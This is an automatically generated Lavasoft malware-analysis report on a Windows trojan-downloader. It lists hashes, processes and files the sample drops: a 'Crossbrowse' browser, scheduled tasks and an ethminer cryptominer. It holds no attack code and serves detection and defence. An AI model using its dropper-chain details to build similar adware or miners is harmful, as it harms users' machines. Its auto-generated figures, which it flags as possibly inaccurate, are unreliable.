Trojan-Downloader.Win32.Genome.syla (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 0092c9655f14abb39377f27c1a0aa364
SHA1: 92ffce48fe8c1a96fbf37b29b2d7a500ce1fd4b6
SHA256: 125a63a85bf12ecba2e2faaa14681212ea81efa5fde64ad47a427aa5b23f7358
SSDeep: 3072: QIURTXJk451jrZpHA nmwILScXY0 VFEQWk9vSPL GPfn45Yzwg3NxvCY9qXSUq: sGOnZRK0VSQNvjGHn45WNwQvrF
Size: 230691 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:46
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
nsy19.tmp:1136
9035.exe:796
nsq1C.tmp:976
nsq1C.tmp:1312
nsz2A.tmp:784
nss23.tmp:516
nsf7.tmp:644
nst13.tmp:444
setup.exe:700
%original file name%.exe:468
nsmB.tmp:640
amisid.exe:444
The Trojan injects its code into the following process(es): No processes have been created.
Mutexes
The following mutexes were created/opened: No objects were found.
File activity
The process nsy19.tmp:1136 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1C.tmp (8472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe (8472 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\inetc.dll (0 bytes)
The process 9035.exe:796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\netflix.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_plus.ico (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\huffingtonpost.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yahoo_finance.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bing.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\skype.ico (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\mail_live_msn.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ikea.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\setup.exe (37305 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\wikipedia.ico (55 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\tumblr.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\amazon.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\etsy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\twitter.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\imdb.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yandex.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\bbc.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\imdb.ico (601 bytes)
%WinDir%\Tasks\157013C7-5C5C-4F90-A397-9AD3412C92F0.job (1464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yahoo_search.ico (5593 bytes)
%WinDir%\Tasks\Crossbrowse.job (1982 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\search.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\google_news.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\nba.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\facebook.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\cnn.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\ted.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\cnn.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\forbes.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yelp.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\hotels.com.ico (47 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nfl.ico (56 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\amazon.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\youtube.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\espn.ico (36 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_news.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\expedia.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\skype.ico (1597 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\bing.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\nfl.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\utility.exe (14022 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\expedia.ico (61 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo.ico (39 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\groupom.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\netflix.ico (51 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\twitter.ico (36 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\tripadvisor.ico (58 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\kayak.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\groupom.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\agoda.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\espn.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bbc.ico (35 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\msn.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\nytimes.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\msn.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ted.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\weather_channel.ico (5593 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yandex.ico (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\ebay.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (306422 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\reddit.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\google_plus.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].002 (3959285 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].001 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].004 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].005 (3959285 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\facebook.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\booking.com.ico (1601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\chrome.dat (24 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\9gag.ico (56 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\target.ico (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\linkedin.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\pinterest.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\chrome.packed.7z (1266739 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\mail.ru.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\gizmodo.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\bestbuy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\157013C7-5C5C-4F90-A397-9AD3412C92F0\157013C7-5C5C-4F90-A397-9AD3412C92F0.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\prefs (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\kayak.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\gizmodo.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\walmart.ico (48 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\icon.json (9 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\reddit.ico (60 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\tripadvisor.ico (1917 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ebay.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\google_translate.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\priceline.ico (53 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\theguardian.ico (1597 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bestbuy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].003 (3959285 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\search.ico (1917 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\forbes.ico (40 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\huffingtonpost.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yahoo.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\tumblr.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\icon.json (21 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\ikea.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\wikipedia.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\target.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\booking.com.ico (45 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (0 bytes)
%WinDir%\Tasks\157013C7-5C5C-4F90-A397-9AD3412C92F0.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\157013C7-5C5C-4F90-A397-9AD3412C92F0\157013C7-5C5C-4F90-A397-9AD3412C92F0.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\157013C7-5C5C-4F90-A397-9AD3412C92F0 (0 bytes)
The process nsq1C.tmp:976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\amisid.exe (909 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\registry.dll (0 bytes)
The process nsq1C.tmp:1312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\amisid.exe (909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\inetc.dll (22 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\inetc.dll (0 bytes)
The process nsz2A.tmp:784 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsa2C.tmp (0 bytes)
The process nss23.tmp:516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsj26.tmp (28995 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\nsExec.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\LICENSE.txt (1552 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\ethm.exe (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\clinfo.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\CPUFeatures.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\start.cmd (303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\nsProcess.dll (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\ns28.tmp (9 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\LICENSE.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\ethm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\clinfo.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\CPUFeatures.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\start.cmd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\ns28.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer (0 bytes)
The process nsf7.tmp:644 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp (0 bytes)
The process nst13.tmp:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\9035.exe (14022 bytes)
The process setup.exe:700 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\libexif.dll (303 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\zh-TW.pak (191 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\el.pak (1668 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\bn.pak (1732 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ko.pak (229 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\hu.pak (236 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\he.pak (254 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Crossbrowse\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\hi.pak (1713 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\pl.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\da.pak (206 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\id.pak (203 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\uk.pak (1622 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sr.pak (1611 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\et.pak (202 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\gu.pak (1705 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\mr.pak (1709 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sv.pak (208 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe (5873 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\es.pak (231 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\zh-CN.pak (188 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ms.pak (207 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\resources.pak (117997 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\it.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\fr.pak (240 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sl.pak (212 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\kn.pak (1769 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ro.pak (229 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\39.6.2171.95.manifest (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\chrome.7z (1150215 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ar.pak (294 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\nb.pak (207 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Extensions\external_extensions.json (99 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\nacl64.exe (12288 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\en-GB.pak (190 bytes)
%Documents and Settings%\All Users\Desktop\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\te.pak (1762 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\lt.pak (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\PepperFlash\pepflashplayer.dll (110258 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\crossbrowse.exe (3869 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ml.pak (1827 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ru.pak (1613 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\nl.pak (217 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\bg.pak (1641 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\pt-BR.pak (218 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\vi.pak (248 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\icudtl.dat (76792 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome_elf.dll (125 bytes)
